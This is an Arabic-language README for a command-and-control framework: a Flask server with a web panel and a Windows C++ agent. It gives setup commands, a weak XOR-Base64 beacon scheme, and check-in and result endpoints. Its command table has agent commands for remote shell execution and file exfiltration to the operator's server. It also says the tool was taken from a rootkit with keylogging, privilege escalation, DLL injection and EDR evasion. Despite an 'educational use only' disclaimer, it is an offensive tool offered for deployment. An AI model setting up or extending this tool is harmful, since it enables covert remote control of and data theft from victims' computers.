
إطار عمل C&C عبر HTTPS مع منارات مشفرة، لوحة تحكم ويب، وعامل لنظام ويندوز.

بنية تحتية للتحكم والأوامر عبر HTTPS مع لوحة تحكم ويب لإدارة وكيل Windows عن بُعد.
⚠️ للاستخدام التعليمي فقط - الاستخدام غير القانوني مسؤوليتك.
الخادم:
cd server
pip install flask
python c2_server.py
الوصول إلى لوحة التحكم: https://localhost:8443
العميل:
build.bat
قم بتعديل client/c2_client.cpp لتعيين عنوان IP الخادم:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
التشفير: XOR + Base64
المفتاح: Hostname + Username + "SecretKey2025"
النقل: HTTPS (المنفذ 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
الخادم: Python 3.9+, Flask
العميل: MinGW-w64 GCC 15.2+, Windows SDK, C++17
تم استخراج إطار عمل C2 هذا من مشروع XvX Usermode Rootkit. تتضمن النسخة الكاملة من الروتكيت C2 أكثر اكتمالاً مع أكثر من 15 أمراً، بما في ذلك إخفاء العمليات/الملفات/السجل، رفع الصلاحية إلى SYSTEM، شل عكسي تفاعلي، وظيفة مسجل لوحة المفاتيح، حقن DLL، وتقنيات تجنب EDR. توفر هذه النسخة المستقلة البنية التحتية الأساسية لـ C2 لأغراض تعليمية وللتكامل السهل في المشاريع المخصصة.
المؤلف: 28zaakypro[@]proton[.]me
| الأمر | الصيغة | الوصف |
|---|
shell | shell <cmd> | تنفيذ أمر شل |
exfil | exfil <path> | استخراج ملف (Base64) |
sleep | sleep <seconds> | تغيير فترة الإشارة |
ping | ping | اختبار الاتصال |
die | die | إنهاء الوكيل |